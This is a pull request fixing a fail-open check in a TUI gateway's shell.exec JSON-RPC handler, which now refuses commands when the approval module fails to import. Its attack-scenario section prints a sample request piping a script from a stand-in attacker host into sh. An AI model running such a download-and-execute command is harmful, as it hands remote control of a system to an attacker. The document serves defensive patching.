### PR TITLE
fix(security): fail-closed when approval module missing in TUI shell.exec to prevent RCE

### DIFF
--- a/tui_gateway/server.py
+++ b/tui_gateway/server.py
@@ -4568,16 +4568,21 @@ def _(rid, params: dict) -> dict:
     cmd = params.get("command", "")
     if not cmd:
         return _err(rid, 4004, "empty command")
+    # Fail-CLOSED: if the dangerous-command guard cannot be loaded, refuse to
+    # execute. Silently skipping the check allows arbitrary commands through
+    # the JSON-RPC interface (RCE).
     try:
         from tools.approval import detect_dangerous_command
-
-        is_dangerous, _, desc = detect_dangerous_command(cmd)
-        if is_dangerous:
-            return _err(
-                rid, 4005, f"blocked: {desc}. Use the agent for dangerous commands."
-            )
     except ImportError:
-        pass
+        return _err(
+            rid, 5004, "shell.exec unavailable: approval module could not be loaded"
+        )
+
+    is_dangerous, _, desc = detect_dangerous_command(cmd)
+    if is_dangerous:
+        return _err(
+            rid, 4005, f"blocked: {desc}. Use the agent for dangerous commands."
+        )
     try:
         r = subprocess.run(
             cmd, shell=True, capture_output=True, text=True, timeout=30, cwd=os.getcwd()


### PR DESCRIPTION
## What does this PR do?

`tui_gateway/server.py` exposes a `shell.exec` JSON-RPC method that
runs shell commands via `subprocess.run(shell=True)`. It tries to
block dangerous commands using `tools.approval.detect_dangerous_command`,
but on `ImportError` it silently falls through to executing the command:

```python
# Before (vulnerable — fail-open)
try:
    from tools.approval import detect_dangerous_command
    is_dangerous, _, desc = detect_dangerous_command(cmd)
    if is_dangerous:
        return _err(rid, 4005, f"blocked: {desc}...")
except ImportError:
    pass  # ← silently disables the guard
```

If `tools.approval` cannot be imported (missing module, circular import,
SyntaxError in a dependency, partial deployment, modified PYTHONPATH),
the dangerous-command check is silently skipped and arbitrary shell
commands are executed via the JSON-RPC interface.

## Attack scenario

1. `tools.approval` import fails for any reason → check silently bypassed
2. Attacker sends:
```json
   {"jsonrpc":"2.0","id":1,"method":"shell.exec",
    "params":{"command":"curl http://attacker.com/sh | sh"}}
```
3. `shell=True` + missing guard → full OS command execution

## Fix

Made the handler fail-closed: if the guard cannot be loaded, refuse
to execute the command rather than silently bypassing the check:

```python
try:
    from tools.approval import detect_dangerous_command
except ImportError:
    return _err(
        rid, 5004, "shell.exec unavailable: approval module could not be loaded"
    )

is_dangerous, _, desc = detect_dangerous_command(cmd)
if is_dangerous:
    return _err(rid, 4005, f"blocked: {desc}...")
```

This is consistent with the fail-closed pattern applied to the cron
SSRF check in #10180.

## Type of Change

- [x] 🔒 Security fix (CRITICAL — fail-open command execution / RCE)

## Checklist

- [x] Read the Contributing Guide
- [x] Commit messages follow Conventional Commits
- [x] Fail-closed — safer default when security module unavailable
- [x] Consistent with existing fail-closed patterns in the codebase
- [x] No behavior change when `tools.approval` is available